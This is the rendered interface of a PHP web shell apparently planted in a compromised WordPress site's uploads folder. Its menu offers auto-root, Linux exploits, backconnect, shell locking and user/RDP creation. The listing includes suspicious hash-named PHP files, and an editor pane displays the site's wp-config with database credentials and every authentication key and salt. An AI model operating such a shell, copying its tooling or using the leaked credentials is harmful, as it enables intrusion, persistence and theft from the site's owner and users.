Linux webm017.cluster127.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.127.20.17 | : 216.73.216.68
Cant Read [ /etc/named.conf ]
8.0.30
uptownsfxx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
uptownsfxx /
www /
wp-content /
uploads /
[ HOME SHELL ]
Name
Size
Permission
Action
.static
[ DIR ]
drwxr-xr-x
.w4c1e7a2f9b3x5
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
2020
[ DIR ]
drwxr-xr-x
2021
[ DIR ]
drwxr-xr-x
2022
[ DIR ]
drwxr-xr-x
2023
[ DIR ]
drwxr-xr-x
2024
[ DIR ]
drwxr-xr-x
2025
[ DIR ]
drwxr-xr-x
2026
[ DIR ]
drwxr-xr-x
fbrfg
[ DIR ]
drwx---r-x
useanyfont
[ DIR ]
drwx---r-x
.htaccess
308
B
-rw-r--r--
1d76eff0.php
677
B
-rw-r--r--
376b6bd0.php
677
B
-rw-r--r--
wp-config.txt
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.txt
<?php //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', 'njZZHKuDQAaynWAUVfr8kbb8aPF4HEp50IyAgL52yhAyEiHj05v18qBvbzgkYRC7'); //END Really Simple Security key /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'uptownsfxx594'); /** MySQL database username */ define('DB_USER', 'uptownsfxx594'); /** MySQL database password */ define('DB_PASSWORD', '5T66hpZ3bppR'); /** MySQL hostname */ define('DB_HOST', 'uptownsfxx594.mysql.db:3306'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'QWHllKtlI1uPGC6YSFJiwOsEcgNm6M1VmSMO/5/gSa3VIOXZlli4n61JDqMa'); define('SECURE_AUTH_KEY', 'nq3Jh7NRSaqIUllqx4TN/lSgpycXtx90CFuDLVfT2O19q+6pHqL57Er+st0Q'); define('LOGGED_IN_KEY', 'eq4TB/tSFIGR8xoVeTFmeKWE5qjdNzucPeaqWSfVCFoBCN8expIpJbB3GQm+'); define('NONCE_KEY', 'il2QL9tU/fqKJGh8V+VsAPX7uNHbBBgMuALx2qqtp9RlpMteMY5odfuRTGmi'); define('AUTH_SALT', 'SqJDTJyXR1MeRGxOJXHEFMCbrkGTvvyc2lSyiJVqZbOAT+VJHnQtwmhNanjv'); define('SECURE_AUTH_SALT', 'ETURohA3kAff2HkoKlE3QFbx3cIrKWX7gFQcnEjgLwKgO86Mu1QBDHmWOcvM'); define('LOGGED_IN_SALT', '/RVwEONhOBGPe7AhXfYuQR6+BtghcNQYpgGMEV6x6ouyJqJU4vg27b7Th/WD'); define('NONCE_SALT', '5N+xHtKNKKSmVubjBydW2AeVtHNzhVyA9bob/cmJklKmGNs5WScGvOcgIlbq'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'mod186_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */ define('CONCATENATE_SCRIPTS', false ); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
Close